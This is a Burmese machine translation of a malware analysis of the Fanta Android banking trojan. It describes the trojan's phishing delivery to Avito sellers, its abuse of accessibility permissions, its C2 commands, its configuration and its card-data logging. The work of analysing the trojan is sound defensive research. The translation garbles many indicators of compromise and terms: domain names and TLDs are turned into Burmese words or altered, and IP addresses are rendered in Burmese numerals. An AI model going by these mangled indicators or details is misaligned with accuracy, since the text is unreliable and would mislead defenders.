Leysya၊ Fanta- Android Trojan အဟောင်းအတွက် နည်းဗျူဟာအသစ်

တစ်နေ့တွင် သင်သည် Avito တွင် တစ်ခုခုရောင်းချလိုပြီး သင့်ထုတ်ကုန်၏အသေးစိတ်ဖော်ပြချက် (ဥပမာ RAM module တစ်ခု) ကိုတင်ပြီးနောက် အောက်ပါမက်ဆေ့ချ်ကို သင်လက်ခံရရှိမည်ဖြစ်သည်။

လင့်ခ်ကိုဖွင့်သောအခါတွင်၊ သင့်ဝယ်ယူမှုပြုလုပ်ပြီးကြောင်း ပျော်ရွှင်စွာနှင့် အောင်မြင်သောရောင်းချသူအား အသိပေးသည့် ကင်းမဲ့သော စာမျက်နှာကို သင်တွေ့မြင်ရပါမည်-

"ဆက်လုပ်ရန်" ခလုတ်ကို နှိပ်လိုက်သည်နှင့်၊ အိုင်ကွန်တစ်ခုနှင့် ယုံကြည်စိတ်ချရသော အမည်ဖြင့် သင့် Android စက်တွင် APK ဖိုင်ကို ဒေါင်းလုဒ်လုပ်ပါမည်။ AccessibilityService လုပ်ပိုင်ခွင့်ကို အကြောင်းတစ်ခုခုကြောင့် တောင်းဆိုထားတဲ့ အက်ပ်တစ်ခုကို သင်ထည့်သွင်းလိုက်ပြီးနောက်၊ ဝင်းဒိုးနှစ်ခုပေါ်လာပြီး အမြန်ပျောက်သွားပြီး ... ဒါပါပဲ။

သင်သည် သင့်လက်ကျန်ငွေကို စစ်ဆေးရန် သွားသော်လည်း အကြောင်းတစ်ခုခုကြောင့် သင့်ဘဏ်လုပ်ငန်းလျှောက်လွှာမှ သင့်ကတ်အသေးစိတ်အချက်အလက်များကို ထပ်မံတောင်းဆိုပါသည်။ ဒေတာကို ထည့်သွင်းပြီးနောက်၊ ကြောက်မက်ဖွယ်ကောင်းသော အရာတစ်ခု ဖြစ်ပေါ်လာသည်- သင့်အတွက် နားမလည်နိုင်သော အကြောင်းရင်းတစ်ခုခုကြောင့်၊ သင့်အကောင့်မှ ငွေများ ပျောက်ကွယ်သွားတော့သည်။ သင်သည် ပြဿနာကို ဖြေရှင်းရန် ကြိုးစားသော်လည်း သင့်ဖုန်းသည် ခုခံနိုင်သည်- ၎င်းသည် နောက်ကျောနှင့် home keys များကို သူ့ဘာသာသူ နှိပ်သည်၊ မပိတ်ဘဲ မည်သည့် လုံခြုံရေးအစီအမံကိုမဆို ဖွင့်ရန် သင့်အား ခွင့်မပြုပါ။ ရလဒ်အနေနဲ့၊ သင့်မှာ ပိုက်ဆံမရှိဘဲ ကျန်နေခဲ့တယ်၊ မင်းရဲ့ထုတ်ကုန်ကို မဝယ်ဘူး၊ မင်းရောထွေးပြီး အံ့သြနေသလား။

အဖြေက ရိုးရှင်းသည်- သင်သည် Flexnet မိသားစု Fanta Android ထရိုဂျန်၏ သားကောင်ဖြစ်သည်။ ဘယ်လိုဖြစ်သွားတာလဲ? ကဲ ရှင်းပြရအောင်။

စာရေးသူများ - Andrey PolovinkinJunior Malicious Code Analyst၊ Ivan PisarevMalicious Code Analyst ၊

တချို့ကစာရင်းဇယား

Android Trojan ၏ Flexnet မိသားစုကို 2015 ခုနှစ်တွင် ပထမဆုံး အစီရင်ခံခဲ့သည်။ လှုပ်ရှားမှုကာလ အတော်အတန်ကြာလာသည်နှင့်အမျှ မိသားစုသည် Fanta၊ Limebot၊ Lipton စသည်ဖြင့် မျိုးကွဲများစွာအထိ တိုးချဲ့လာခဲ့သည်။ Trojan နှင့် ၎င်းနှင့်ဆက်စပ်နေသော အခြေခံအဆောက်အအုံများသည် ရပ်တန့်မနေပါ - ထိရောက်သောဖြန့်ဖြူးမှုအစီအစဉ်အသစ်များကို တီထွင်လျက်ရှိသည် - ကျွန်ုပ်တို့၏အခြေအနေတွင်၊ သုံးစွဲသူ-ရောင်းချသူအတွက် ရည်ရွယ်သော အရည်အသွေးမြင့် ဖြားယောင်းခြင်းစာမျက်နှာများနှင့် Trojan developer များသည် ဖက်ရှင်ခေတ်ရေစီးကြောင်းများကို လိုက်နာကြသည်။ ဗိုင်းရပ်စ်ရေးသားခြင်း - ၎င်းတို့သည် ကူးစက်ခံထားရသော စက်ပစ္စည်းများမှ ပိုက်ဆံများကို ပိုမိုထိရောက်စွာခိုးယူနိုင်ပြီး အကာအကွယ်ယန္တရားများကို ရှောင်ကွင်းနိုင်စေသည့် လုပ်ဆောင်ချက်အသစ်များကို ထည့်သွင်းထားသည်။

ဤဆောင်းပါးတွင် ဖော်ပြထားသည့် ကမ်ပိန်းသည် ရုရှားနိုင်ငံမှ သုံးစွဲသူများအတွက် ရည်ရွယ်ပြီး၊ ကူးစက်ခံထားရသော စက်အနည်းအကျဉ်းကို ယူကရိန်းတွင် မှတ်တမ်းတင်ထားပြီး၊ ကာဇက်စတန်နှင့် ဘီလာရုစ်တို့တွင် အနည်းငယ်သာရှိသည်။

Flexnet သည် Android Trojan Arena တွင် 4 နှစ်ကျော်ရှိခဲ့ပြီး သုတေသီများစွာမှ အကျယ်တဝင့်လေ့လာခဲ့သော်လည်း ၎င်းသည် ကောင်းမွန်နေဆဲဖြစ်သည်။ 2019 ခုနှစ် ဇန်နဝါရီလမှ စတင်၍ ပျက်စီးဆုံးရှုံးမှု အလားအလာသည် ရူဘယ် 35 သန်းကျော်ရှိပြီး ၎င်းသည် ရုရှားရှိ ကမ်ပိန်းများအတွက်သာ ဖြစ်သည်။ 2015 ခုနှစ်တွင်၊ ဤ Android Trojan ၏ ဗားရှင်းအမျိုးမျိုးကို မြေအောက်ဖိုရမ်များတွင် ရောင်းချခဲ့ပြီး၊ အသေးစိတ်ဖော်ပြချက်နှင့်အတူ Trojan ၏အရင်းအမြစ်ကုဒ်ကိုလည်း သင်ရှာဖွေနိုင်သည်။ ဆိုလိုသည်မှာ ကမ္ဘာပေါ်ရှိ ပျက်စီးဆုံးရှုံးမှုစာရင်းဇယားသည် ပို၍ပင် အထင်ကြီးစရာပင်ဖြစ်သည်။ အဲဒီလို အဘိုးကြီးအတွက် မဆိုးဘူး မဟုတ်လား၊

ရောင်းချခြင်းမှ လိမ်လည်ခြင်းအထိ

ကြော်ငြာများတင်ရန်အတွက် Avito အင်တာနက်ဝန်ဆောင်မှုအောက်ရှိ phishing စာမျက်နှာ၏ယခင်တင်ပြထားသည့်ဖန်သားပြင်ဓာတ်ပုံမှတွေ့မြင်နိုင်သည်အတိုင်း၊ ၎င်းကိုသတ်သတ်မှတ်မှတ်သားကောင်အတွက်ပြင်ဆင်ထားသည်။ ထင်ရှားသည်မှာ၊ တိုက်ခိုက်သူများသည် Avito ၏ ခွဲခြမ်းစိတ်ဖြာမှုတစ်ခုအား အသုံးပြုကာ ရောင်းချသူ၏ဖုန်းနံပါတ်နှင့် အမည်အပြင် ထုတ်ကုန်၏ဖော်ပြချက်တို့ကို ထုတ်ယူအသုံးပြုခဲ့သည်။ စာမျက်နှာကို ဖြန့်ကျက်ပြီး APK ဖိုင်ကို ပြင်ဆင်ပြီးနောက်၊ ကုန်ပစ္စည်း၏ “ရောင်းချမှု” မှရရှိသည့်ပမာဏနှင့် ကုန်ပစ္စည်း၏ “ရောင်းချမှု” မှရရှိသည့်ပမာဏပါရှိသော ဖြားယောင်းခြင်းစာမျက်နှာသို့ ၎င်း၏အမည်နှင့် ဖြားယောင်းခြင်းစာမျက်နှာသို့ လင့်ခ်တစ်ခုပါရှိသော SMS မက်ဆေ့ဂျ်တစ်စောင် ပေးပို့သည်။ ခလုတ်ကိုနှိပ်ခြင်းဖြင့်၊ အသုံးပြုသူသည် အန္တရာယ်ရှိသော APK ဖိုင် - Fanta ကို လက်ခံရရှိမည်ဖြစ်သည်။

shcet491[.]ru ဒိုမိန်း၏လေ့လာမှုတစ်ခုက၎င်းကို Hostinger ၏ DNS ဆာဗာများသို့လွှဲအပ်ထားကြောင်းပြသခဲ့သည်-

• ns1.hostinger.ru
• ns2.hostinger.ru
• ns3.hostinger.ru
• ns4.hostinger.ru

ဒိုမိန်းဇုန် ဖိုင်တွင် IP လိပ်စာများ 31.220.23[.]236၊ 31.220.23[.]243၊ နှင့် 31.220.23[.]235 တို့ကို ညွှန်ပြသည့် စာသားများ ပါရှိသည်။ သို့သော်၊ ဒိုမိန်းမာစတာအရင်းအမြစ်မှတ်တမ်း (A-record) သည် IP လိပ်စာ 178.132.1[.]240 ဖြင့် ဆာဗာကို ညွှန်ပြသည်။

IP လိပ်စာ 178.132.1[.]240 သည် နယ်သာလန်တွင် တည်ရှိပြီး hoster မှ ပိုင်ဆိုင်သည် ကမ္ဘာရေစီးကြောင်း. IP လိပ်စာများသည် 31.220.23[.]235, 31.220.23[.]236 နှင့် 31.220.23[.]243 တို့သည် United Kingdom တွင်တည်ရှိပြီး မျှဝေထားသော hosting ဆာဗာ HOSTINGER နှင့် သက်ဆိုင်ပါသည်။ မှတ်ပုံတင်အရာရှိအဖြစ် အသုံးပြုခဲ့သည်။ openprov-ru. ဒိုမိန်းများကိုလည်း IP လိပ်စာ 178.132.1[.]240 သို့ ဖြေရှင်းခဲ့သည်-

• sdelka-ru[.]ru
• ထုတ်ကုန်-av[.]ru
• av-ထုတ်ကုန်[.]ru
• en-deal[.]en
• shcet382[.]ru
• sdelka221[.]en
• sdelka211[.]en
• vyplata437[.]ru
• viplata291[.]en
• ဘာသာပြန် 273[.]en
• ဘာသာပြန် 901[.]en

အောက်ပါဖော်မတ်၏လင့်ခ်များကို ဒိုမိန်းအားလုံးနီးပါးမှ ရရှိနိုင်ကြောင်း သတိပြုသင့်သည်-

http://(www.){0,1}<%domain%>/[0-9]{7}

ဤပုံစံပလိတ်တွင် SMS မက်ဆေ့ခ်ျမှ လင့်ခ်တစ်ခုလည်း ပါဝင်သည်။ သမိုင်းအချက်အလက်များအရ၊ အထက်ဖော်ပြပါပုံစံအတိုင်း လင့်ခ်အများအပြားသည် Trojan ကို သားကောင်အများအပြားထံသို့ ဖြန့်ဝေရန် ဒိုမိန်းတစ်ခုအသုံးပြုခြင်းကို ညွှန်ပြသည့် ဒိုမိန်းတစ်ခုနှင့် ဆက်စပ်နေကြောင်း တွေ့ရှိခဲ့သည်။

ရှေ့ကိုနည်းနည်းခုန်လိုက်ကြရအောင်- ထိန်းချုပ်ဆာဗာအနေဖြင့် SMS မှလင့်ခ်မှဒေါင်းလုဒ်လုပ်ထားသော Trojan သည် လိပ်စာကိုအသုံးပြုသည် onuseseddohap[.]ကလပ်. ဤဒိုမိန်းကို 2019-03-12 တွင် မှတ်ပုံတင်ခဲ့ပြီး 2019-04-29 မှစတင်၍ APK အပလီကေးရှင်းများသည် ဤဒိုမိန်းနှင့် အပြန်အလှန်အကျိုးသက်ရောက်ခဲ့သည်။ VirusTotal မှရရှိသောဒေတာအပေါ်အခြေခံ၍ စုစုပေါင်း application 109 ခုသည် ဤဆာဗာနှင့် အပြန်အလှန်အကျိုးသက်ရောက်ခဲ့သည်။ ဒိုမိန်းကိုယ်တိုင်က IP လိပ်စာတစ်ခုအဖြစ် ဖြေရှင်းသည်။ ၂၁၇.၂၃.၁၄[.]၂၇နယ်သာလန်တွင် တည်ရှိပြီး အိမ်ရှင်တစ်ဦးမှ ပိုင်ဆိုင်သည်။ ကမ္ဘာရေစီးကြောင်း. မှတ်ပုံတင်အရာရှိအဖြစ် အသုံးပြုခဲ့သည်။ မင်းသမီး. ဒိုမိန်းများကိုလည်း ဤ IP လိပ်စာသို့ ဖြေရှင်းပြီးပါပြီ။ bad-racoon[.]ကလပ် (2018-09-25) မှစတင်၍ bad-racoon[.] တိုက်ရိုက်လွှင့် (2018-10-25) မှစတင်၍ ဒိုမိန်းနှင့်အတူ bad-racoon[.]ကလပ် APK ဖိုင် 80 ကျော်နှင့် အပြန်အလှန် တုံ့ပြန်ထားသည်။ bad-racoon[.] တိုက်ရိုက်လွှင့် - 100 ကျော်။

ယေဘုယျအားဖြင့် တိုက်ခိုက်မှု၏ လမ်းကြောင်းမှာ အောက်ပါအတိုင်းဖြစ်သည်။

အဖုံးအောက်မှာ Fanta မှာ ဘာတွေပါလဲ။

အခြား Android Trojan များကဲ့သို့ပင် Fanta သည် SMS မက်ဆေ့ချ်များကို ဖတ်နိုင်၊ ပေးပို့နိုင်၊ USSD တောင်းဆိုမှုများကို ပြုလုပ်နိုင်ပြီး အပလီကေးရှင်းများ (ဘဏ်လုပ်ငန်းအပါအဝင်) ထိပ်တွင် ၎င်း၏ကိုယ်ပိုင် windows ကို ပြသနိုင်သည်။ သို့သော်၊ ဤမိသားစု၏လုပ်ဆောင်နိုင်စွမ်းများ၏လက်နက်တိုက်တွင်ရောက်ရှိခဲ့သည်- Fanta ကိုစတင်အသုံးပြုခဲ့သည်။ သုံးစွဲနိုင်မှုဝန်ဆောင်မှု ရည်ရွယ်ချက်အမျိုးမျိုးအတွက်- အခြားအပလီကေးရှင်းများ၏ အကြောင်းကြားချက်များ၏ အကြောင်းအရာများကို ဖတ်ရှုခြင်း၊ ထောက်လှမ်းခြင်းအား တားဆီးခြင်းနှင့် ကူးစက်ခံထားရသော စက်ပစ္စည်းတစ်ခုပေါ်တွင် Trojan လုပ်ဆောင်ခြင်းကို ရပ်တန့်ခြင်း စသည်ဖြင့်၊ Fanta သည် 4.4 ထက်ဟောင်းသော Android ဗားရှင်းအားလုံးတွင် အလုပ်လုပ်သည်။ ဤဆောင်းပါးတွင်၊ အောက်ပါ Fanta နမူနာကို အနီးကပ် လေ့လာကြည့်ပါမည်။

• MD5: 0826bd11b2c130c4c8ac137e395ac2d4
• SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
• SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb

လွှင့်တင်ပြီးပြီးချင်း

လွှင့်တင်ပြီးပြီးချင်း၊ Trojan သည် ၎င်း၏အိုင်ကွန်ကို ဝှက်ထားသည်။ ရောဂါပိုးကူးစက်ခံထားရသော စက်၏အမည်စာရင်းတွင် မပါဝင်ပါက အပလီကေးရှင်းသည် အလုပ်လုပ်နိုင်သည်-

• android_x86
• VirtualBox
• Nexus 5X (ခေါင်းတုံး)
• Nexus 5 (သင်တုန်းဓား)

ဤစစ်ဆေးမှုကို ပင်မ Trojan ဝန်ဆောင်မှုတွင် လုပ်ဆောင်သည် - ပင်မဝန်ဆောင်မှု. ပထမဦးစွာစတင်ချိန်တွင်၊ အပလီကေးရှင်း၏ဖွဲ့စည်းပုံသတ်မှတ်ချက်ဘောင်များကို ပုံသေတန်ဖိုးများဖြင့် အစပြုထားပါသည် (ဖွဲ့စည်းပုံဒေတာသိုလှောင်မှုပုံစံနှင့် ၎င်းတို့၏အဓိပ္ပာယ်ကို နောက်ပိုင်းတွင်ဆွေးနွေးပါမည်) နှင့် ထိန်းချုပ်မှုဆာဗာတွင် ကူးစက်ခံထားရသော စက်ပစ္စည်းအသစ်တစ်ခု၏ မှတ်ပုံတင်ခြင်းကို လုပ်ဆောင်ပါသည်။ HTTP POST တောင်းဆိုချက်ကို မက်ဆေ့ခ်ျအမျိုးအစားဖြင့် ဆာဗာသို့ ပေးပို့မည်ဖြစ်သည်။ register_bot ရောဂါပိုးကူးစက်ခံထားရသောစက်ပစ္စည်းနှင့်ပတ်သက်သောအချက်အလက်များ (Android ဗားရှင်း၊ IMEI၊ ဖုန်းနံပါတ်၊ အော်ပရေတာအမည်နှင့် အော်ပရေတာမှတ်ပုံတင်ထားသည့် နိုင်ငံ၏ကုဒ်)။ လိပ်စာကို စီမံခန့်ခွဲမှုဆာဗာအဖြစ် အသုံးပြုသည်။ hXXp://onuseseddohap[.]club/controller.php. တုံ့ပြန်မှုတွင်၊ ဆာဗာသည် အကွက်များပါရှိသော စာတိုတစ်စောင် ပေးပို့သည်။ bot_id, bot_pwd, ဆာဗာက — ဤတန်ဖိုးများကို CnC ဆာဗာ၏ ကန့်သတ်ချက်များအဖြစ် အပလီကေးရှင်းမှ သိမ်းဆည်းထားသည်။ ကန့်သတ်ချက် ဆာဗာက အကွက်ကို လက်ခံမရပါက ရွေးချယ်နိုင်သည်- Fanta သည် မှတ်ပုံတင်လိပ်စာကို အသုံးပြုသည်။ hXXp://onuseseddohap[.]club/controller.php. ပြဿနာနှစ်ခုကိုဖြေရှင်းရန် CnC လိပ်စာကိုပြောင်းလဲခြင်း၏လုပ်ဆောင်ချက်ကို ဆာဗာများစွာကြားတွင် ဝန်ကိုအညီအမျှဖြန့်ဝေရန် (ကူးစက်ခံထားရသောစက်ပစ္စည်းများစွာဖြင့်၊ အကောင်းဆုံးမလုပ်ဆောင်ထားသောဝဘ်ဆာဗာတစ်ခုပေါ်ရှိဝန်အား မြင့်မားနိုင်သည်) နှင့် အခြားရွေးချယ်စရာတစ်ခုကိုလည်း အသုံးပြုရန်၊ CnC ဆာဗာများထဲမှ တစ်ခု၏ ပျက်ကွက်မှုဖြစ်စဉ်တွင် ဆာဗာ။

တောင်းဆိုချက်ပေးပို့ရာတွင် အမှားအယွင်းတစ်ခုဖြစ်ပေါ်ပါက၊ Trojan သည် စက္ကန့် 20 ကြာပြီးနောက် မှတ်ပုံတင်ခြင်းလုပ်ငန်းစဉ်ကို ပြန်လည်လုပ်ဆောင်မည်ဖြစ်သည်။

စက်ပစ္စည်းကို အောင်မြင်စွာ မှတ်ပုံတင်ပြီးနောက်၊ Fanta သည် သုံးစွဲသူထံ အောက်ပါမက်ဆေ့ချ်ကို ပြသပါမည်-

အရေးကြီးသောမှတ်ချက်- ဝန်ဆောင်မှုဟုခေါ်သည်။ စနစ်လုံခြုံရေး - Trojan ဝန်ဆောင်မှု၏အမည်နှင့်ခလုတ်ကိုနှိပ်ပြီးနောက် OK ကို ရောဂါပိုးကူးစက်ခံထားရသော စက်၏ သုံးစွဲနိုင်မှု ဆက်တင်များပါရှိသော ဝင်းဒိုးတစ်ခု ပွင့်လာမည်ဖြစ်ပြီး၊ သုံးစွဲသူသည် အန္တရာယ်ရှိသော ဝန်ဆောင်မှုအတွက် သုံးစွဲနိုင်မှုဆိုင်ရာ အခွင့်အရေးများကို ကိုယ်တိုင်ပေးဆောင်ရပါမည်-

အသုံးပြုသူကဖွင့်ပြီးတာနဲ့ သုံးစွဲနိုင်မှုဝန်ဆောင်မှုFanta သည် ၎င်းတို့တွင် လုပ်ဆောင်ခဲ့သော အပလီကေးရှင်းဝင်းဒိုးများနှင့် လုပ်ဆောင်ချက်များ၏ အကြောင်းအရာများကို ဝင်ရောက်ကြည့်ရှုသည်-

သုံးစွဲနိုင်မှုအခွင့်အရေးများရရှိပြီးနောက် ချက်ချင်းဆိုသလို၊ Trojan သည် အသိပေးချက်များကို ဖတ်ရန် စီမံခန့်ခွဲသူအခွင့်အရေးနှင့် လုပ်ပိုင်ခွင့်များကို တောင်းဆိုသည်-

AccessibilityService ၏အကူအညီဖြင့်၊ အပလီကေးရှင်းသည် သော့ခတ်ခြင်းများကို အတုယူကာ လိုအပ်သောအခွင့်အရေးအားလုံးကို ကိုယ်တိုင်ပေးဆောင်သည်။

Fanta သည် လုပ်ငန်းစဉ်အတွင်း စုဆောင်းထားသော ကူးစက်ခံထားရသော စက်ပစ္စည်းအကြောင်း အချက်အလက်များကို သိမ်းဆည်းရန်အတွက် လိုအပ်သော ဒေတာဘေ့စ်များ (နောက်ပိုင်းတွင် ဖော်ပြမည့်) အများအပြားကို ဖန်တီးပါသည်။ စုဆောင်းထားသော အချက်အလက်များကို ပေးပို့ရန်အတွက်၊ Trojan သည် ဒေတာဘေ့စ်မှ ကွက်လပ်များကို လွှင့်တင်ပြီး ထိန်းချုပ်မှုဆာဗာထံမှ ညွှန်ကြားချက်တစ်ခုကို လက်ခံရယူရန် ဒီဇိုင်းထုတ်ထားသည့် ထပ်တလဲလဲ လုပ်ဆောင်သည့် အလုပ်တစ်ခုကို ဖန်တီးသည်။ CnC ခေါ်ဆိုမှုအတွက် ကြားကာလကို Android ဗားရှင်းပေါ်မူတည်၍ သတ်မှတ်ထားသည်- 5.1 တွင်၊ ကြားကာလသည် 10 စက္ကန့်၊ သို့မဟုတ် 60 စက္ကန့်ဖြစ်သည်။

အမိန့်တစ်ခုလက်ခံရန် Fanta သည် တောင်းဆိုချက်တစ်ခုပြုလုပ်သည်။ GetTask control server သို့။ တုံ့ပြန်မှုအနေဖြင့် CnC သည် အောက်ပါ command များထဲမှ တစ်ခုကို ပေးပို့နိုင်သည်-

အဖွဲ့	ဖေါ်ပြချက်
0	SMS မက်ဆေ့ခ်ျပို့ပါ။
1	ဖုန်းခေါ်ဆိုမှု သို့မဟုတ် USSD အမိန့်ကို ပြုလုပ်ပါ။
2	ကန့်သတ်ချက်တစ်ခုကို အပ်ဒိတ်လုပ်သည်။ အကြား
3	ကန့်သတ်ချက်တစ်ခုကို အပ်ဒိတ်လုပ်သည်။ ကြားဖြတ်
6	ကန့်သတ်ချက်တစ်ခုကို အပ်ဒိတ်လုပ်သည်။ smsManager
9	SMS စာတိုများ စတင်စုဆောင်းပါ။
11	ဖုန်းကို စက်ရုံဆက်တင်များသို့ ပြန်လည်သတ်မှတ်ပါ။
12	ဒိုင်ယာလော့ဂ်ဘောက်စ်များ ဖန်တီးခြင်းကို ဖွင့်ခြင်း/ပိတ်ခြင်း

Fanta သည် ဘဏ်လုပ်ငန်း 70၊ မြန်ဆန်သောငွေပေးချေမှုနှင့် e-wallet အပလီကေးရှင်းများမှ အကြောင်းကြားချက်များကို စုဆောင်းပြီး ဒေတာဘေ့စ်တစ်ခုတွင် သိမ်းဆည်းထားသည်။

ဖွဲ့စည်းမှုသတ်မှတ်ချက်ဘောင်များကို သိမ်းဆည်းခြင်း။

configuration parameters များကို သိမ်းဆည်းရန် Fanta သည် Android ပလပ်ဖောင်းအတွက် စံချဉ်းကပ်နည်းကို အသုံးပြုသည်။ preferences ကို- ဖိုင်များ။ ဆက်တင်များကို အမည်ရှိသော ဖိုင်တစ်ခုတွင် သိမ်းဆည်းမည်ဖြစ်သည်။ setting များကို. သိမ်းဆည်းထားသော ဘောင်များ၏ ဖော်ပြချက်သည် အောက်ပါဇယားတွင် ရှိပါသည်။

နာမတျောကို	မူလတန်ဖိုး	တန်ဖိုးများ ဖြစ်နိုင်သည်။	ဖေါ်ပြချက်
id	0	ကိန်း	Bot ID
ဆာဗာက	hXXp://onuseseddohap[.]club/	URL ကို	စီမံခန့်ခွဲမှုဆာဗာလိပ်စာ
ရသ	-	ကြိုး	ဆာဗာ စကားဝှက်
အကြား	20	ကိန်း	အချိန်ကြားကာလ။ အောက်ပါလုပ်ဆောင်စရာများကို မည်မျှကြာကြာ နှောင့်နှေးစေသည်ကို ပြသည်- ပေးပို့လိုက်တဲ့ SMS မက်ဆေ့ချ်ရဲ့ အခြေအနေကို တောင်းဆိုချက်တစ်ခု ပေးပို့တဲ့အခါ ထိန်းချုပ်ဆာဗာမှ အမိန့်အသစ်တစ်ခုကို လက်ခံရယူနေပါသည်။
ကြားဖြတ်	အားလုံး	အားလုံး/တယ်လီဖုန်းနံပါတ်	အကယ်၍ အကွက်သည် string နှင့် ညီသည်။ အားလုံး သို့မဟုတ် တယ်လီနံပါတ်ထို့နောက် လက်ခံရရှိထားသော SMS မက်ဆေ့ချ်ကို အပလီကေးရှင်းမှ ကြားဖြတ်မည်ဖြစ်ပြီး သုံးစွဲသူအား ပြသမည်မဟုတ်ပါ။
smsManager	0	0/1	မူရင်း SMS လက်ခံသူအဖြစ် အပလီကေးရှင်းကို ဖွင့်/ပိတ်ပါ။
readDialog	မမှန်သော	မှန်/မမှန်	ဖြစ်ရပ်မှတ်တမ်းကို ဖွင့်/ပိတ်ပါ။ သုံးစွဲနိုင်မှုဖြစ်ရပ်

Fanta သည် ဖိုင်ကိုလည်း အသုံးပြုသည်။ smsManager:

နာမတျောကို	မူလတန်ဖိုး	တန်ဖိုးများ ဖြစ်နိုင်သည်။	ဖေါ်ပြချက်
pckg	-	ကြိုး	အသုံးပြုထားသော SMS မန်နေဂျာ၏အမည်

ဒေတာဘေ့စ်အပြန်အလှန်

Trojan သည် ၎င်း၏လုပ်ဆောင်မှုအတွင်း ဒေတာဘေ့စ်နှစ်ခုကို အသုံးပြုသည်။ ဒေတာဘေ့စ်အမည် a ဖုန်းမှစုဆောင်းထားသော အချက်အလက်အမျိုးမျိုးကို သိမ်းဆည်းရန်အတွက် အသုံးပြုသည်။ ဒုတိယဒေတာဘေ့စ်ကိုအမည်ပေးသည်။ fanta.db ဘဏ်ကတ်များအကြောင်း အချက်အလက်စုဆောင်းရန် ဒီဇိုင်းထုတ်ထားသည့် phishing windows ဖန်တီးမှုအတွက် တာဝန်ရှိသော ဆက်တင်များကို သိမ်းဆည်းရန် အသုံးပြုပါသည်။

Trojan သည် ဒေတာဘေ့စ်ကို အသုံးပြုသည်။ а စုဆောင်းထားသော အချက်အလက်များကို သိမ်းဆည်းရန်နှင့် ၎င်းတို့၏ လုပ်ဆောင်ချက်များကို မှတ်တမ်းတင်ရန်။ ဒေတာကို ဇယားတစ်ခုထဲတွင် သိမ်းဆည်းထားသည်။ မှတ်တမ်းများ. ဇယားတစ်ခုဖန်တီးရန် အောက်ပါ SQL query ကိုအသုံးပြုသည်-

create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)

ဒေတာဘေ့စ်တွင် အောက်ပါအချက်အလက်များပါရှိသည်။

1. ရောဂါပိုးရှိသော စက်ပစ္စည်းကို မက်ဆေ့ခ်ျတစ်ခုဖြင့် ဖွင့်ပါ။ ဖုန်းဖွင့်ထားသည်။

2. အပလီကေးရှင်းများမှ အကြောင်းကြားချက်များ။ မက်ဆေ့ချ်ကို အောက်ပါပုံစံအတိုင်း ဖွဲ့စည်းထားပါသည်။

(<%App Name%>)<%Title%>: <%Notification text%>

3. Trojan မှ ဖန်တီးထားသော phishing ပုံစံများမှ ဘဏ်ကတ်ဒေတာ။ ကန့်သတ်ချက် VIEW_NAME စာရင်းထဲမှတစ်ခု ဖြစ်နိုင်သည်-

• AliExpress
• Avito
• Google Play စ
• အမျိုးမျိုးသော <%App Name%>

မက်ဆေ့ဂျ်ကို ဖော်မတ်ဖြင့် မှတ်တမ်းတင်ထားသည်-

[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>

4. ဖော်မတ်ဖြင့် အဝင်/အထွက် SMS စာတိုများ-

([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>

5. ဖော်မတ်ဖြင့် ဒိုင်ယာလော့ဂ်ဘောက်စ်ကို ဖန်တီးသည့် အထုပ်အကြောင်း အချက်အလက်-

(<%Package name%>)<%Package information%>

ဇယားဥပမာ မှတ်တမ်းများ:

Fanta ၏လုပ်ဆောင်ချက်များထဲမှတစ်ခုမှာ ဘဏ်ကတ်များအကြောင်း အချက်အလက်စုဆောင်းခြင်းဖြစ်ပါသည်။ ဘဏ်လုပ်ငန်း အပလီကေးရှင်းများဖွင့်သည့်အခါ phishing ဝင်းဒိုးများ ဖန်တီးခြင်းဖြင့် ဒေတာစုဆောင်းသည်။ Trojan သည် တစ်ကြိမ်သာ phishing window တစ်ခုကို ဖန်တီးသည်။ ဝင်းဒိုးကို အသုံးပြုသူအား ပြသခဲ့သည့် အချက်အလက်များကို ဇယားတွင် သိမ်းဆည်းထားသည်။ setting များကို အဆိုပါဒေတာဘေ့စ၌တည်၏ fanta.db. ဒေတာဘေ့စ်ကိုဖန်တီးရန် အောက်ပါ SQL query ကိုအသုံးပြုသည်-

create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);

ဇယားကွက်များအားလုံး setting များကို မူရင်းအတိုင်း 1 ( phishing window ကိုဖန်တီးပါ ) သို့ အစပြုပါသည်။ အသုံးပြုသူသည် ၎င်းတို့၏ဒေတာကို ထည့်သွင်းပြီးနောက်၊ တန်ဖိုးကို 0 ဟု သတ်မှတ်မည်ဖြစ်သည်။ ဇယားကွက်လပ်များ ဥပမာ setting များကို:

• can_login — ဘဏ်လုပ်ငန်းလျှောက်လွှာကိုဖွင့်သည့်အခါ နယ်ပယ်သည် ဖောင်ကိုပြသရန် တာဝန်ရှိသည်။
• ပထမ_ဘဏ် - အသုံးမပြုပါ။
• can_avito - Avito အပလီကေးရှင်းကိုဖွင့်သောအခါတွင် နယ်ပယ်သည် ဖောင်ကိုပြသရန် တာဝန်ရှိသည်။
• can_ali - Aliexpress အပလီကေးရှင်းကိုဖွင့်သောအခါတွင် နယ်ပယ်သည် ပုံစံကိုပြသရန် တာဝန်ရှိသည်။
• can_နောက်ထပ် - စာရင်းမှမည်သည့်လျှောက်လွှာကိုဖွင့်သောအခါတွင်ဖောင်ကိုပြသရန်အကွက်သည်တာဝန်ရှိသည်။ Yula၊ Pandao၊ Drome Auto၊ Wallet။ လျှော့စျေးနှင့် အပိုဆုကတ်များ၊ Aviasales၊ Booking၊ Trivago
• can_card - အကွက်ဖွင့်သည့်အခါ ပုံစံကိုပြသရန် တာဝန်ရှိသည်။ Google Play စ

ထိန်းချုပ်မှုဆာဗာနှင့် အပြန်အလှန်တုံ့ပြန်မှု

